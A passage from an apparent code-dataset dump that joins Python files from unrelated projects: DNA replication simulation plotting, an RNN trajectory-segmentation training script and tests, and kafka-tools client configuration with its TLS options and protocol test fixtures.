# plot(time_p, dna)
result = {"chr": [], "start": [], "end": [], "mean_copie_exp": [], "mean_copie_simu": []}
# f = figure(figsize=(20,20))
if fig is None:
f = plt.figure(figsize=figsize)
elif fig == "other":
pass
else:
f = fig
mean_copie = {}
if not profile:
k = list(times.keys())
k.sort()
for ikk, kk in enumerate(k):
mean_copie[kk] = self.get_mean_copie(max(0, int(kk) - shift))[0]
# print(mean_copie[kk],len(mean_copie[kk][0]) )
# print(len( mean_copie[kk]))
if profile:
max_t = self.get_times_replication()
max_t = self.get_rep_profile(allp=False)
if which == "mean":
max_t = np.max(list(map(max, max_t)))
else:
max_t = max(np.array(max_t)[which])
if max_t == -1:
max_t = np.max(self.get_times_replication(finished=False))
extra = [0, 0, 0, 1, 2, 2, 2, 3, 3, 3, 4, 4, 5, 5, 6, 6]
position = [0, 1, 2, 0, 0, 1, 2, 0, 1, 2, 0, 1, 0, 1, 0, 1]
sS = 0.03
sh = 0.04
height = 1 / (7 + 1) - sh
margin_right = 0.02
for chro in N_chrom:
# ax = f.add_subplot(4,4,chro + 1)
# ax = f.add_subplot(gs[chro])
# print([xstart,ystart,w,h])
if fig != "other":
column = extra[chro]
tot = extra.count(column)
p = position[chro]
row_lengths = [l for l, i in zip(self.lengths, extra) if column == i]
crow_length = [0] + np.cumsum(row_lengths).tolist()
xstart = (p + 1) * sS + (1 - margin_right - tot * sS) * \
crow_length[p] / (sum(row_lengths))
ystart = 1 - (column + 1) * (height + sh)
w = (1 - margin_right - tot * sS) * row_lengths[p] / (sum(row_lengths))
h = height
f.add_axes([xstart, ystart, w, h])
# print(chro, w, h, (1 - margin_right - tot * sS))
# chro = 3
if profile:
if which == "mean":
Prof = self.get_rep_profile(allp=False)[chro]
x = np.arange(len(Prof)) * coarse / 1000.
# print(Prof)
plt.plot(x, Prof * self.dte, label="Simulated")
plt.xlim(-10, x[-1] + 10)
top = Prof * self.dte
else:
for sim in which:
x = np.arange(len(self.aRps[sim][chro])) * coarse / 1000.
plt.plot(x, self.aRps[sim][chro] * self.dte)
top = self.aRps[sim][chro]
plt.xlim(-10, x[-1] + 10)
else:
k = list(times.keys())
k.sort()
for ikk, kk in enumerate(k):
if ikk == 0:
mean_C = mean_copie[kk][chro]
else:
mean_C += mean_copie[kk][chro]
x = np.arange(len(mean_C)) * coarse / 1000.
plt.plot(np.arange(len(mean_C)) * coarse / 1000., mean_C / len(k))
plt.xlim(-10, x[-1] + 10)
top = mean_C / len(k)
if ori:
if strength_ori is not None:
st = strength_ori[chro]
else:
st = [1] * len(self.l_ori[chro])
pos = self.l_ori[chro]
if self.positions != None:
pos = self.positions[chro]
for x, s in zip(pos, st):
# print(np.array(top)[~np.equal(top, None)])
mini = min(np.array(top)[~np.equal(top, None)])
maxi = max(np.array(top)[~np.equal(top, None)])
#mini = 1
#maxi = 2
# print(mini, maxi)
col = "k"
if s != 1:
col = {"Confirmed": "r", "Likely": "g", "Dubious": "b"}[s]
plt.plot([x * coarse / 1000., x * coarse / 1000],
[mini, maxi], "--", color=col, linewidth=1)
def get_rep_prof(times, coordinate, ch, profile=True):
k = list(times.keys())
k.sort()
# To get all the coordinates
m = []
for kk in k:
m = list(set(coordinate[kk][ch] + m))
m.sort()
# print(len(m))
rep = np.zeros(len(m)) # + 70
norm = np.zeros(len(m))
for ilocus, locus in enumerate(m):
# print(locus)
for kk in k[:: -1]:
if locus in coordinate[kk][ch]:
i = list(coordinate[kk][ch]).index(locus)
if profile:
if times[kk][ch][i] > 1.5:
rep[ilocus] = min(int(kk), 70)
else:
# Mean replication value
rep[ilocus] += times[kk][ch][i]
norm[ilocus] += 1
norm[norm == 0] = 1
if profile:
rep[rep == 0] = 70
# print(times[kk][ch])
return m, rep / norm
if experiment:
locci, p = get_rep_prof(times, coordinate, chro, profile=profile)
# m = lengths[chro] / len(p)
# plot(np.arange(len(p)) * m,p)
if not profile:
for loc, copie in zip(locci, p):
result["chr"].append(chro + 1)
result["start"].append(loc)
result["end"].append(loc)
result["mean_copie_exp"].append(copie)
try:
result["mean_copie_simu"].append(top[int(loc / coarse)])
except IndexError:
if warning:
print("out of bounds")
result["mean_copie_simu"].append(top[-1])
if not profile:
plt.plot(np.array(locci) / 1000., p, "-", label="simulated")
if profile:
prof = pd.read_csv(
"../../../ifromprof/notebooks/exploratory/Yeast_wt_alvino.csv")
plt.plot(prof[prof.chr == chro + 1]["coordinate (kb)"],
prof[prof.chr == chro + 1].TrepA, label="Experimental")
if centro:
lc = "../../data/external/saccharomyces_cerevisiae_R64-2-1_20150113.gff"
lengths, centrom = load_lengths_and_centro(lc, 1000, verbose=False)
# print(centrom)
plt.plot([centrom[chro], centrom[chro]], [0, max_t])
if profile:
plt.ylim(max_t, 0)
else:
plt.ylim(1., 2.)
if extra[chro] == 6:
plt.xlabel("Genomic position (kb)")
if position[chro] == 0:
if profile:
plt.ylabel("rep time (min)")
else:
plt.ylabel("gene copy number")
class ensembleSimAnalysis(ensembleSim):
def __init__(self, json_file, hdf5_file, Nsim=None):
with open(json_file, "r") as f:
self.parameters = json.load(f)
sub_sample_ori = self.parameters.get("sub_sample_ori", None)
if sub_sample_ori:
self.parameters.pop("sub_sample_ori")
if "lengths" in self.parameters:
l_ori = [list(range(int(self.parameters["lengths"][0] * sub_sample_ori)))]
lengths = self.parameters["lengths"]
else:
l_ori = [list(range(int(self.parameters["len_chrom"][0] * sub_sample_ori)))]
lengths = self.parameters["len_chrom"]
else:
extra = "../../"
if type(self.parameters["lengths"]) == str:
lengths, _ = load_lengths_and_centro(
extra + self.parameters["lengths"], self.parameters["coarse"])
self.parameters["lengths"] = lengths
if type(self.parameters["Nori"]) == str and self.parameters["Nori"] != "xenope":
d = {"C": "Confirmed", "L": "Likely", "D": "Dubious"}
ot = []
for o in self.parameters["ori_type"]:
ot.append(d[o])
l_ori = load_ori_position(extra + self.parameters["Nori"],
ot,
self.parameters["lengths"],
self.parameters["coarse"], coarsed=self.parameters["coarsed"])
if Nsim is None:
Nsim = self.parameters["Nsim"]
if "Ndiff" in self.parameters:
Ndiff = self.parameters["Ndiff"]
else:
Ndiff = self.parameters["N_diffu"]
if "p_on" in self.parameters:
p_on = self.parameters["p_on"]
else:
p_on = self.parameters["p_inte"]
if "p_v" in self.parameters:
p_v = self.parameters["p_v"]
else:
p_v = self.parameters["cut_off_inte"]**3 / self.parameters["R"]**3
ensembleSim.__init__(self, Nsim=Nsim,
Nori=None, Ndiff=Ndiff,
lengths=lengths,
p_on=p_on,
p_v=p_v,
dt_speed=self.parameters["dt_speed"],
fork_speed=self.parameters["fork_speed"],
p_off=None, only_one=True, l_ori=l_ori)
self.hdf5_file = hdf5_file
```
|
{
"source": "jeammimi/rnn_seg",
"score": 2
}
|
#### File: src/models/train_model.py
```python
print(__package__)
import theano
# theano.config.mode = "FAST_COMPILE"
from ..data.generate_n_steps_flexible import generate_n_steps as Flexible
from ..data.generate_n_steps import generate_n_steps as BDSD
from keras.callbacks import ModelCheckpoint, ReduceLROnPlateau, CSVLogger
import threading
import os
import keras.backend as K
# sys.path.append("../features")
# print(__name__)
# print(sys.path)
import numpy as np
ndim = 2
np.random.seed(6)
def generator(**kwargs):
# n_steps_before_change = kwargs.get("n_steps_before_change", 50)
step = 0
Step = kwargs.get("Step", {0: 26, 1: 50, 2: 100, 3: 200, 4: 400})
# Step = kwargs.get("Step", {0: 26, 1: 26, 2: 26, 3: 26, 4: 26})
while True:
n_steps = int(step // 50) % len(Step)
if kwargs.get("model", None):
n_steps = len(kwargs.get("model").history.epoch) % len(Step)
if kwargs.get("validation", None):
n_steps = step % len(Step)
if kwargs["type"] == "flexible":
X, Y, Trajs = Flexible(kwargs["size_sample"], Step[n_steps], kwargs["ndim"])
if kwargs.get("traj", False):
yield X, Y, Trajs
else:
yield X, Y
elif kwargs["type"] == "BDSD":
X, Y, Y_cat, Trajs = BDSD(kwargs["size_sample"], Step[
n_steps], kwargs["ndim"], kwargs["sub"])
if kwargs.get("traj", False):
yield X, {"category": Y_cat, "output": Y}, Trajs
else:
# print(X.shape, step)
# if kwargs.get("model", None):
# print(kwargs.get("model").history.epoch)
if kwargs.get("old", False):
yield {"input1": X, "category": Y_cat, "output": Y}
else:
yield X, {"category": Y_cat, "output": Y}
step += 1
class createBatchGenerator:
def __init__(self, **kwargs):
self.kwargs = kwargs
self.lock = threading.Lock()
def __iter__(self):
return self
def next(self):
kwargs = self.kwargs
with self.lock:
step = 0
Step = kwargs.get("Step", {0: 26, 1: 50, 2: 100, 3: 200, 4: 400})
# Step = kwargs.get("Step", {0: 26, 1: 26, 2: 26, 3: 26, 4: 26})
while True:
n_steps = int(step // 50) % len(Step)
if kwargs.get("model", None):
n_steps = len(kwargs.get("model").history.epoch) % len(Step)
if kwargs.get("validation", None):
n_steps = step % len(Step)
if kwargs["type"] == "flexible":
X, Y, Trajs = Flexible(kwargs["size_sample"], Step[n_steps], kwargs["ndim"])
if kwargs.get("traj", False):
yield X, Y, Trajs
else:
yield X, Y
elif kwargs["type"] == "BDSD":
X, Y, Y_cat, Trajs = BDSD(kwargs["size_sample"], Step[
n_steps], kwargs["ndim"], kwargs["sub"])
if kwargs.get("traj", False):
yield X, {"category": Y_cat, "output": Y}, Trajs
else:
# print(X.shape, step)
# if kwargs.get("model", None):
# print(kwargs.get("model").history.epoch)
if kwargs.get("old", False):
yield {"input1": X, "category": Y_cat, "output": Y}
else:
yield X, {"category": Y_cat, "output": Y}
step += 1
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--NLayers', default=3, type=int)
parser.add_argument('--Ndim', default=3, type=int)
parser.add_argument('--dir', type=str)
parser.add_argument('--hidden', default=50, type=int)
parser.add_argument('--simple', dest='simple', action='store_true')
parser.add_argument('--old', dest='old', action='store_true')
parser.add_argument('--no-segmentation', dest='segmentation', action='store_false')
parser.add_argument('--sub', dest='sub', action='store_true')
parser.add_argument('--Nepochs', default=200, type=int)
parser.add_argument('--average', dest='merge_mode', action='store_true')
args = parser.parse_args()
print(args.simple)
if args.sub:
n_cat = 27
n_states = 10
else:
n_cat = 12
n_states = 7
if args.Ndim == 3:
inputsize = 6
elif args.Ndim == 2:
inputsize = 5
type_traj = "BDSD"
if args.segmentation is False:
type_traj = "flexible"
merge_mode = "concat"
if args.merge_mode:
merge_mode = "ave"
if not args.old:
from .build_model import build_model
model = build_model(n_states=n_states, n_cat=n_cat, n_layers=args.NLayers,
inputsize=inputsize, hidden=args.hidden, simple=args.simple,
segmentation=args.segmentation, merge_mode=merge_mode)
Generator = lambda model, validation: generator(size_sample=20, n_steps_before_change=50,
sub=args.sub, type=type_traj, ndim=args.Ndim, model=model, validation=validation, old=args.old)
else:
from .build_model_old import return_layer_paper
model = return_layer_paper(ndim=2, inside=args.hidden, permutation=True, inputsize=inputsize, simple=False,
n_layers=3, category=True, output=True, n_cat=n_cat, sub=args.sub)
Generator = lambda model, validation: createBatchGenerator(size_sample=50, n_steps_before_change=50,
sub=args.sub, type=type_traj, ndim=args.Ndim, model=model, validation=validation, old=args.old)
# for epochs in range(args.Nepochs):
if not args.old:
Check = ModelCheckpoint(filepath="./data/" + args.dir + "/weights.{epoch:02d}-{val_loss:.2f}.hdf5", monitor='val_loss', verbose=0,
save_best_only=False, save_weights_only=True, mode='auto', period=5)
else:
Check = ModelCheckpoint(filepath="./data/" + args.dir + "/weights.{epoch:02d}-{val_loss:.2f}.hdf5", monitor='val_loss', verbose=0,
save_best_only=False, save_weights_only=True, mode='auto')
Reduce = ReduceLROnPlateau(factor=0.5, patience=15, min_lr=0.01)
if not args.old:
Log = CSVLogger(filename="./data/" + args.dir + "/training.log")
model.fit_generator(generator=Generator(model, False), steps_per_epoch=45,
validation_steps=5, epochs=args.Nepochs, workers=1,
callbacks=[Reduce, Check, Log], validation_data=Generator(model, True),
max_q_size=10)
else:
gen = generator(size_sample=20 * 50, sub=args.sub, type=type_traj,
ndim=args.Ndim, validation=True, old=args.old)
if os.path.exists("./data/" + args.dir + "/training.log"):
os.remove("./data/" + args.dir + "/training.log")
Reduce.on_train_begin()
for i in range(args.Nepochs):
for data in gen:
data = data
break
print(data["input1"].shape)
Log = CSVLogger(filename="./data/" + args.dir + "/training.log", append=True)
r = model.fit(data, batch_size=20, nb_epoch=1,
callbacks=[Check, Log], validation_split=0.1) # , initial_epoch=i)
#from IPython import embed
# embed()
# print(r["val_loss"])
if i % 200 == 0:
new_lr = float(K.get_value(model.optimizer.lr)) / 2
K.set_value(model.optimizer.lr, new_lr)
#Reduce.model = model
#Reduce.on_epoch_end(i, logs={"val_loss": r.history["val_loss"][-1]})
```
#### File: src/tests_auto/automated_test.py
```python
import numpy as np
import pylab as plt
from ..data.generator_traj import generate_traj
from ..data.motion_type import random_rot
from ..features.prePostTools import traj_to_dist
def single_all_separation(graph, model, range_mu=None, range_len=None,
maxlen=800, ndim=2, plot=True, noise_level=0, sm=0, g4=False, limit=False, v=1):
if range_mu is None:
range_mu = np.arange(1, 3.1, 0.2)
if range_len is None:
range_len = range(25, 200, 25)
# rangemu=[3]
res = np.zeros((len(range_mu), 3 + 12))
for Mu, mu in enumerate(range_mu):
print(Mu, mu,)
Nt = 100
for Lenght, l in enumerate(range_len):
if l % 2 == 1:
l = l - 1
Traj = []
Real_traj = []
S = []
for n in range(Nt):
size = l
Ra0 = [0, 1.]
succeed = False
g = 0
while not succeed or g > 10:
# try:
# print "gen"
g += 1
ModelN, Model_num, s, sc, real_traj, norm, alpha2 = generate_traj(size, lower_selfprob=0.4,
fight=False, diff_sigma=2,
deltav=0.1, zeros=False,
delta_sigma_directed=0.1,
force_model=model,
anisentropy=0,
ndim=ndim, fixed_self_proba=False)
if Model_num == 3:
break
# except IndexError:
# print("Failed")
# succeed = False
#R = get_parameters(real_traj,s,1,1,2)
# print R[0][2][1] , R[1][2] [0]
alpharot = 2 * 3.14 * np.random.random()
real_traj2 = random_rot(real_traj, alpharot, ndim=ndim)
if noise_level != 0:
real_traj2 += np.random.normal(0, noise_level, real_traj.shape)
alligned_traj, normed = traj_to_dist(real_traj, ndim=ndim)
Traj.append(normed)
Real_traj.append(real_traj2)
S.append(s)
# print np.array(Traj).shape,np.array(Traj)[::,:l,::].shape
res1 = graph.predict({"input1": np.array(Traj)[::, :l, ::]},)
cat = res1["category"]
if limit:
cat = cat[::, :5]
# print np.argmax(cat,-1)
res[Mu, Lenght] = np.sum(np.argmax(cat, -1) == [3]) / 1.0 / Nt
if plot:
cmap = plt.get_cmap("cool")
plt.imshow(res[::-1, ::], interpolation="None", extent=(0, 400, 1, 3),
aspect=200, vmin=0, vmax=1, cmap=cmap)
plt.colorbar()
plt.savefig("separation-unfilterer1.png")
return res, Real_traj, S
def Brownian_V_separation(graph, range_mu=None, range_len=None,
maxlen=800, ndim=2, plot=True, noise_level=0, limit=False, v=1, batch_size=10):
if range_mu is None:
range_mu = np.arange(1, 3.1, 0.2)
if range_len is None:
range_len = range(25, 400, 25)
# rangemu=[3]
res = np.zeros((len(range_mu), 3 + 12))
for Mu, mu in enumerate(range_mu):
print(Mu, mu,)
Nt = 100
for Lenght, l in enumerate(range_len):
if l % 2 == 1:
l = l - 1
Traj = []
Real_traj = []
S = []
for n in range(Nt):
size = l
Ra0 = [0, 1.]
succeed = False
g = 0
while not succeed or g > 10:
# try:
# print "gen"
g += 1
if ndim == 2:
Mu0 = [
[mu, 0], [1, 1], [0, 0]]
elif ndim == 3:
Mu0 = [[mu, 0, 0], [1, 1, 1], [0, 0, 0]]
ModelN, Model_num, s, sc, real_traj, norm, alpha2 = generate_traj(size, lower_selfprob=0.9,
fight=False, diff_sigma=2,
deltav=0.1, zeros=False,
delta_sigma_directed=0.1,
force_model=3,
anisentropy=0,
Ra0=Ra0, Mu0=Mu0,
ndim=ndim, fixed_self_proba=True)
if Model_num == 3:
break
# except IndexError:
# print("Failed")
# succeed = False
#R = get_parameters(real_traj,s,1,1,2)
# print R[0][2][1] , R[1][2] [0]
alpharot = 2 * 3.14 * np.random.random()
real_traj2 = random_rot(real_traj, alpharot, ndim=ndim)
if noise_level != 0:
real_traj2 += np.random.normal(0, noise_level, real_traj.shape)
alligned_traj, normed, _, _ = traj_to_dist(real_traj, ndim=ndim)
Traj.append(normed)
Real_traj.append(real_traj2)
S.append(s)
# print np.array(Traj).shape,np.array(Traj)[::,:l,::].shape
res1 = graph.predict(np.array(Traj)[::, :l, ::], batch_size=batch_size)
# print(res1)
cat = res1[1]
if limit:
cat = cat[::, :5]
print(np.argmax(cat, -1))
res[Mu, Lenght] = np.sum(np.argmax(cat, -1) == [3]) / 1.0 / Nt
if plot:
cmap = plt.get_cmap("cool")
plt.imshow(res[::-1, ::], interpolation="None", extent=(0, 400, 1, 3),
aspect=200, vmin=0, vmax=1, cmap=cmap)
plt.colorbar()
plt.savefig("separation-unfilterer1.png")
return res, Real_traj, S,
# Brownian_V_separation("test",sm=1)
# Brownian_V_separation("test",sm=1)
```
|
{
"source": "jean0313/kafka-tools",
"score": 2
}
|
#### File: kafka/tools/configuration.py
```python
import os
import six
import ssl
from kafka.tools.exceptions import ConfigurationError
def eval_boolean(value):
"""Attempt to evaluate the argument as a boolean"""
if isinstance(value, bool):
return value
elif isinstance(value, six.integer_types):
return value != 0
else:
return value.lower() in ['true', 'yes', 'on']
def check_file_access(filename):
if not os.access(filename, os.R_OK):
raise ConfigurationError("filename specified ({0}) is not accessible for reading".format(filename))
class ClientConfiguration(object):
#######################
# CONNECTION PROPERTIES
#
# broker_list and zkconnect are the two possible ways of specifying the Kafka cluster to connect to. One of these
# options must be provided, and only one can be provided. By default, the broker_list is set to point to localhost
@property
def broker_list(self):
"""The broker list to use for bootstrapping the client
This broker list is only used for the initial client connect. The client will connect to one of the brokers
specified and fetch the cluster information, including a list of brokers.
The format of the broker list is a comma-separated list of hostname:port
hostname:port[,hostname:port...]
"""
return getattr(self, '_broker_list', 'localhost:9092')
@broker_list.setter
def broker_list(self, value):
if not isinstance(value, six.string_types):
raise TypeError("broker_list must be a string")
# We're not going to validate much here - if the user does the wrong thing, they'll get an error on connect
self._broker_list = []
hostports = value.split(',')
for hostport in hostports:
(host, port) = hostport.rsplit(':', 1)
self._broker_list.append((host, int(port)))
@property
def zkconnect(self):
"""The zookeeper connection string for the Kafka cluster
This is the Zookeeper connection string that points to the Kafka cluster metadata. It is the same stirng that
is used when configuring the Kafka brokers. The format is:
host:port[,host:port...][/chroot/path]
"""
return getattr(self, '_zkconnect', None)
@zkconnect.setter
def zkconnect(self, value):
# We're not going to validate this past being a string. It's too much of a pain, and Kazoo will handle it
if not isinstance(value, six.string_types):
raise TypeError("zkconnect must be a string")
self._zkconnect = value
################
# SSL PROPERTIES
#
# All of these properties are using for setting up TLS connections to the Kafka brokers. The defaults provided are
# reasonable for a secure connection, except that enable_tls is disabled by default.
@property
def enable_tls(self):
"""Enable TLS for Kafka broker connections"""
return getattr(self, '_enable_tls', False)
@enable_tls.setter
def enable_tls(self, value):
self._enable_tls = eval_boolean(value)
@property
def tls_verify_certificates(self):
"""Define whether or not to verify the server host certificate is valid and trusted when TLS is enabled"""
return getattr(self, '_tls_verify_certificates', True)
@tls_verify_certificates.setter
def tls_verify_certificates(self, value):
self._tls_verify_certificates = eval_boolean(value)
@property
def tls_verify_hostnames(self):
"""Define whether or not to verify the server hostname matches the host certificate provided"""
return getattr(self, '_tls_verify_hostnames', True)
@tls_verify_hostnames.setter
def tls_verify_hostnames(self, value):
self._tls_verify_hostnames = eval_boolean(value)
@property
def tls_root_certificates(self):
"""Path to the trusted root certificates. If not provided, the system default will be used"""
return getattr(self, '_tls_root_certificates', None)
@tls_root_certificates.setter
def tls_root_certificates(self, value):
check_file_access(value)
self._tls_root_certificates = value
@property
def tls_client_certificate(self):
"""Path to the client certificate, optionally including a key. If not provided, no client certificate is used"""
return getattr(self, '_tls_client_certificate', None)
@tls_client_certificate.setter
def tls_client_certificate(self, value):
check_file_access(value)
self._tls_client_certificate = value
@property
def tls_client_keyfile(self):
"""Path to the client certificate key file, if separate from the client certificate file."""
return getattr(self, '_tls_client_keyfile', None)
@tls_client_keyfile.setter
def tls_client_keyfile(self, value):
check_file_access(value)
self._tls_client_keyfile = value
@property
def tls_client_key_password_callback(self):
"""A function that will be called to get the keyfile password.
This is a function that will be called to get the password that protects the keyfile specified. This must be a
Python callable that takes no arguments. It must return a string, byte, or bytearray
If not specified, the keyfile is assumed to be unprotected
"""
return getattr(self, '_tls_client_key_password_callback', None)
@tls_client_key_password_callback.setter
def tls_client_key_password_callback(self, value):
if not callable(value):
raise TypeError("tls_client_key_password_callback is not callable".format(value))
self._tls_client_key_password_callback = value
#######################
# KAFKA CLIENT SETTINGS
#
# The rest of these configurations are used for controlling the behavior of the client
@property
def client_id(self):
"""The client ID string to use when talking to the brokers"""
return getattr(self, '_client_id', "kafka-tools")
@client_id.setter
def client_id(self, value):
raise_if_not_string("client_id", value)
self._client_id = value
@property
def metadata_refresh(self):
"""How long topic and group metadata can be cached"""
return getattr(self, '_metadata_refresh', 60000)
@metadata_refresh.setter
def metadata_refresh(self, value):
raise_if_not_positive_integer("metadata_refresh", value)
self._metadata_refresh = value
@property
def max_request_size(self):
"""The largest size for outgoing Kafka requests. Used to allocate the request buffer"""
return getattr(self, '_max_request_size', 200000)
@max_request_size.setter
def max_request_size(self, value):
raise_if_not_positive_integer("max_request_size", value)
self._max_request_size = value
@property
def num_retries(self):
"""The number of times to retry a request when there is a failure"""
return getattr(self, '_num_retries', 3)
@num_retries.setter
def num_retries(self, value):
raise_if_not_positive_integer("_num_retries", value)
self._num_retries = value
@property
def retry_backoff(self):
"""The number of seconds (float) to wait between request retries"""
return getattr(self, '_retry_backoff', 0.5)
@retry_backoff.setter
def retry_backoff(self, value):
raise_if_not_positive_float("_retry_backoff", value)
self._retry_backoff = value
@property
def broker_threads(self):
"""How many threads to use in a pool for broker connections"""
return getattr(self, '_broker_threads', 20)
@broker_threads.setter
def broker_threads(self, value):
raise_if_not_positive_integer("broker_threads", value)
self._broker_threads = value
def _set_attributes(self, **kwargs):
for key in kwargs:
if not hasattr(self, key):
raise ConfigurationError("Invalid configuration specified: {0}".format(key))
setattr(self, key, kwargs[key])
def __init__(self, **kwargs):
"""
Create a configuration object, setting any provided options. Either broker_list or zkconnect (but not both)
must be provided
Raises:
ConfigurationError: unless exactly one of broker_list or zkconnect is provided, or if any invalid option
is specified.
"""
if ('zkconnect' in kwargs) and ('broker_list' in kwargs):
raise ConfigurationError("Only one of zkconnect and broker_list may be provided")
self._set_attributes(**kwargs)
# Create the SSL context if we are going to enable TLS
self.ssl_context = self._create_ssl_context() if self.enable_tls else None
def _verify_ssl_configuration(self):
if self.tls_verify_hostnames and (not self.tls_verify_certificates):
raise ConfigurationError("tls_verify_hostnames may not be specified if tls_verify_certificates is False")
def _create_ssl_context(self):
self._verify_ssl_configuration()
try:
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED if self.tls_verify_certificates else ssl.CERT_NONE
context.check_hostname = self.tls_verify_hostnames
if self.tls_root_certificates is None:
context.load_default_certs(purpose=ssl.Purpose.CLIENT_AUTH)
else:
context.load_verify_locations(cafile=self.tls_root_certificates)
if self.tls_client_certificate is not None:
context.load_cert_chain(self.tls_client_certificate,
keyfile=self.tls_client_keyfile,
password=self.tls_client_key_password_callback)
except ssl.SSLError as e:
raise ConfigurationError("Unable to configure SSL Context: {0}".format(e))
return context
def raise_if_not_positive_integer(attr_name, value):
if not (isinstance(value, six.integer_types) and (value > 0)):
raise TypeError("{0} must be a positive integer".format(attr_name))
def raise_if_not_positive_float(attr_name, value):
if not (isinstance(value, float) and (value > 0.0)):
raise TypeError("{0} must be a positive float".format(attr_name))
def raise_if_not_string(attr_name, value):
if not isinstance(value, six.string_types):
raise TypeError("{0} must be a string".format(attr_name))
```
#### File: tools/client/fixtures.py
```python
from kafka.tools.protocol.responses.list_groups_v0 import ListGroupsV0Response
from kafka.tools.protocol.responses.list_offset_v0 import ListOffsetV0Response
from kafka.tools.protocol.responses.offset_commit_v2 import OffsetCommitV2Response
from kafka.tools.protocol.responses.offset_fetch_v1 import OffsetFetchV1Response
from kafka.tools.protocol.responses.describe_groups_v0 import DescribeGroupsV0Response
from kafka.tools.protocol.responses.metadata_v1 import MetadataV1Response
from kafka.tools.protocol.responses.metadata_v0 import MetadataV0Response
from kafka.tools.protocol.responses.group_coordinator_v0 import GroupCoordinatorV0Response
def describe_groups():
ma_1 = b'\x00\x00\x00\x00\x00\x01\x00\x06topic1\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff'
ma_2 = b'\x00\x00\x00\x00\x00\x01\x00\x06topic1\x00\x00\x00\x01\x00\x00\x00\x01\xff\xff\xff\xff'
return DescribeGroupsV0Response({'groups': [{'group_id': 'testgroup',
'error': 0,
'state': 'Stable',
'protocol': 'roundrobin',
'protocol_type': 'consumer',
'members': [{'member_id': 'testmember1',
'client_id': 'testclientid1',
'client_host': 'host.example.com',
'member_metadata': b'\x90\x83\x24\xbc',
'member_assignment': ma_1},
{'member_id': 'testmember2',
'client_id': 'testclientid2',
'client_host': 'otherhost.example.com',
'member_metadata': b'\x89\x34\x78\xad',
'member_assignment': ma_2}
]
}]
})
def describe_groups_error():
return DescribeGroupsV0Response({'groups': [{'group_id': 'testgroup',
'error': 16,
'state': None,
'protocol': None,
'protocol_type': None,
'members': None}]})
def topic_metadata():
return MetadataV1Response({'brokers': [{'node_id': 1,
'host': 'host1.example.com',
'port': 8031,
'rack': 'rack1'},
{'node_id': 101,
'host': 'host2.example.com',
'port': 8032,
'rack': 'rack2'}],
'controller_id': 1,
'topics': [{'error': 0,
'name': 'topic1',
'internal': False,
'partitions': [{'error': 0,
'id': 0,
'leader': 1,
'replicas': [101, 1],
'isrs': [101, 1]},
{'error': 0,
'id': 1,
'leader': 101,
'replicas': [101, 1],
'isrs': [1, 101]}]}]})
def topic_metadata_v0():
return MetadataV0Response({'brokers': [{'node_id': 1,
'host': 'host1.example.com',
'port': 8031,
'rack': 'rack1'},
{'node_id': 101,
'host': 'host2.example.com',
'port': 8032,
'rack': 'rack2'}],
'controller_id': 1,
'topics': [{'error': 0,
'name': 'topic1',
'internal': False,
'partitions': [{'error': 0,
'id': 0,
'leader': 1,
'replicas': [101, 1],
'isrs': [101, 1]},
{'error': 0,
'id': 1,
'leader': 101,
'replicas': [101, 1],
'isrs': [1, 101]}]}]})
def topic_metadata_error():
return MetadataV1Response({'brokers': [{'node_id': 1,
'host': 'host1.example.com',
'port': 8031,
'rack': 'rack1'},
{'node_id': 101,
'host': 'host2.example.com',
'port': 8032,
'rack': 'rack2'}],
'controller_id': 1,
'topics': [{'error': 3,
'name': 'topic1',
'internal': False,
'partitions': None}]})
def group_coordinator():
return GroupCoordinatorV0Response({'error': 0,
'node_id': 1,
'host': 'host1.example.com',
'port': 8031})
def group_coordinator_error():
return GroupCoordinatorV0Response({'error': 15,
'node_id': -1,
'host': None,
'port': -1})
def list_groups():
return ListGroupsV0Response({'error': 0, 'groups': [{'group_id': 'group1',
'protocol_type': 'protocol1'}]})
def list_groups_error():
return ListGroupsV0Response({'error': 1, 'groups': None})
def list_offset():
return ListOffsetV0Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'error': 0,
'offsets': [4829]},
{'partition': 1,
'error': 0,
'offsets': [8904]}]}]})
def list_offset_none():
return ListOffsetV0Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'error': 0,
'offsets': [4829]},
{'partition': 1,
'error': 0,
'offsets': []}]}]})
def list_offset_error():
return ListOffsetV0Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'error': 6,
'offsets': None},
{'partition': 1,
'error': 0,
'offsets': [8904]}]}]})
def offset_fetch():
return OffsetFetchV1Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'metadata': None,
'error': 0,
'offset': 4829},
{'partition': 1,
'metadata': None,
'error': 0,
'offset': 8904}]}]})
def offset_fetch_error():
return OffsetFetchV1Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'error': 6,
'metadata': None,
'offset': -1},
{'partition': 1,
'metadata': None,
'error': 0,
'offset': 8904}]}]})
def offset_commit_response():
return OffsetCommitV2Response({'responses': [{'topic': 'topic1',
'partition_responses': [{'partition': 0,
'error': 0},
{'partition': 1,
'error': 16}]}]})
```
#### File: tools/client/test_topics.py
```python
import time
import unittest
from mock import MagicMock
from tests.tools.client.fixtures import topic_metadata
from kafka.tools.client import Client
from kafka.tools.exceptions import TopicError
from kafka.tools.models.broker import Broker
from kafka.tools.models.topic import Topic
from kafka.tools.protocol.requests.topic_metadata_v1 import TopicMetadataV1Request
def assert_cluster_has_topics(cluster, metadata):
for mtopic in metadata['topics']:
assert mtopic['name'] in cluster.topics
topic = cluster.topics[mtopic['name']]
assert topic.name == mtopic['name']
assert topic.internal == mtopic['internal']
assert len(topic.partitions) == len(mtopic['partitions'])
for i, tp in enumerate(mtopic['partitions']):
partition = topic.partitions[i]
assert partition.num == tp['id']
assert partition.leader.id == tp['leader']
assert len(partition.replicas) == len(tp['replicas'])
for j, tp_replica in enumerate(tp['replicas']):
assert partition.replicas[j].id == tp_replica
def assert_cluster_has_brokers(cluster, metadata):
for b in metadata['brokers']:
assert b['node_id'] in cluster.brokers
broker = cluster.brokers[b['node_id']]
assert broker.hostname == b['host']
assert broker.port == b['port']
assert broker.rack == b['rack']
class TopicsTests(unittest.TestCase):
def setUp(self):
# Dummy client for testing - we're not going to connect that bootstrap broker
self.client = Client()
self.metadata_response = topic_metadata()
def test_maybe_update_full_metadata_expired(self):
